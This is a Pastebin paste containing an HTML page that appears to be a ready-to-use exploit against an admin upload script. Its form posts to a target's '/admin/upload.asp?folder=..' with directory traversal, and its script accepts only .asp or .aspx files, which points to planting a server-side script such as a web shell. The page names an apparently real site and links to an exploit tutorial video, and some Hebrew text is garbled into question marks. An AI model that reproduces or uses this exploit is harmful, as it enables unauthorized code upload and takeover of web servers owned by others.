Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html><head><script>
- var tblContentBackgroundAlternate = ""
- var tblContentBackground = ""
- </script>
- <script type="text/javascript" src="js/common.js"></script>
- <script>
- function chkfile(){
- filename = document.uploadfrm.uploadFile.value.toLowerCase()
- fileext = filename.slice(filename.length-3,filename.length);
- if (((fileext != "asp")&&(fileext != "aspx")) || (filename.length <= 4)){
- alert("???? ????? ???? ????")
- return false;
- }
- document.uploadfrm.submit();
- }
- </script>
- <link href="http://www.zchori.co.il/admin/styles/adminstyles.css" rel="stylesheet" type="text/css">
- <meta http-equiv="CONTENT-TYPE" content="TEXT/HTML; CHARSET=WINDOWS-1255">
- </head>
- <body>
- <div dir="rtl">
- <form action="http://www.target.co.il/admin/upload.asp?folder=.." enctype="multipart/form-data" method="POST" name="uploadfrm">
- <table cellpadding="3" cellspacing="3" border="0" dir="rtl">
- <tbody><tr>
- <td align="right"> <input class="textbox" type="file" name="uploadFile" size="30"> </td>
- <td align="right"> <input type="button" class="buttonText_light" name="but_????" ??????="" style="cursor:hand;" onclick="chkfile();" value="???? ??????"> </td>
- </tr>
- </tbody></table>
- <input type="hidden" name="up" value="1">
- </form>
- </div>
- Exploit tutorial : https://www.youtube.com/watch?v=ILarrTOYDPA&feature=youtu.be
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
